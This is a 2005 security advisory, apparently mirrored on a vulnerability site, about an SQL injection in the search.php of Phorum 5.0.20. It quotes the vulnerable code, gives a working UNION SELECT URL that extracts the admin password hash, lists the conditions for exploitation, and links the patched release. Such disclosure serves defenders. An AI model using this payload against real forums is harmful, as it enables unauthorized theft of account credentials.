Sql injection in Phorum 5.0.20 and earlier

2005.11.06
Credit: waraxe
Risk: Medium
Local: Yes
Remote: Yes
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

{===========================================} { [waraxe-2005-SA#043] } {===========================================} { } { [ Sql injection in Phorum 5.0.20 and earlier ] } { } {====================================} Author: Janek Vind "waraxe" Date: 04. November 2005 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-43.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Phorum 5.0.20 Homepage: http://phorum.org/ What is Phorum? Phorum is a web based message board written in PHP. Phorum is designed with high-availability and visitor ease of use in mind. Features such as mailing list integration, easy customization and simple installation make Phorum a powerful add-in to any website. Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Critical sql injection has been found in Phorum 5.0.0.alpha to 5.0.20. Phorum 5.1.x branch (in alpha stage) seems to be unaffected. Details ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Problem lies in uninitialized array "$forum_ids" in "search.php" file. >From source code: ----------------[ from source code ]------------------ $forum_ids[$row["forum_id"]] = $row["forum_id"]; $match_number++; } $forums = phorum_db_get_forums($forum_ids); foreach($arr["rows"] as $key => $row){ $arr["rows"][$key]["forum_url"] = phorum_get_url(PHORUM_LIST_URL, $row["forum_id"]); $arr["rows"][$key]["forum_name"] = $forums[$row["forum_id"]]["name"]; } ----------------[ /from source code ]----------------- This can give as possibilities to "inject" arbitrary data to "$forum_ids" array by GPC and next let's look at "phorum_db_get_forums()" function from "include/db/mysql.php" : ----------------[ from source code ]------------------ if (is_array($forum_ids)) $forum_ids = implode(",", $forum_ids); $sql = "select * from {$PHORUM['forums_table']} "; if ($forum_ids){ $sql .= " where forum_id in ($forum_ids)"; } elseif (func_num_args() > 1) { $sql .= " where parent_id = $parent_id"; if(!defined("PHORUM_ADMIN")) $sql.=" and active=1"; } $sql .= " order by display_order ASC, name"; $res = mysql_query($sql, $conn); if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql"); ----------------[ /from source code ]----------------- So sql query manipulation seems to be possible. Now let's try this in real world ... [------ real life exploit ------] http://localhost/phorum520/search.php?1,search=a,page=1,match_type=ALL, match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99) /**/UNION/**/ALL/**/SELECT/**/1,password,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,21,32/**/FROM/**/phorum_users /**/WHERE/**/admin=1/**/LIMIT/**/1/* There are some critical conditions for exploit to be successful. 1. "register_globals" must be "on", so we can poison php variable space through GPC. 2. "search=a" - this search string must return one or more results. 3. "SELECT/**/1,password" - first number in sql injection, in our case "1", must be "forum_id" for forum in search results. 4. sql table prefix "phorum_" can be different, but this will give nice sql error messages and reveal real prefix. 5. Some Phorum versions seems to have different table structure for "phorum_users", so again, there will be sql error messages. It's easy to overcome this kind of problem by altering sql injection string as "trial/error". [----- /real life exploit ------] See ya and have a nice day ;) Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 01. november 2005 - vendor first contacted 01. november 2005 - vendor response 02. november 2005 - details emailed to vendor 03. november 2005 - vendor released new, patched version 04. november 2005 - public advisory released How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Download new Phorum version 5.0.21 from: http://phorum.org/downloads/phorum-5.0.21.tar.gz More info: http://phorum.org/story.php?57 Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to LINUX, Heintz, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and all other active members from waraxe community ! Tervitused - Raido Kerna ! Additional resources: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DX expedition database - http://www.dxdb.com/ Hard disc recovery - http://www.hdd911.com/ Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Homepage: http://www.waraxe.us/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top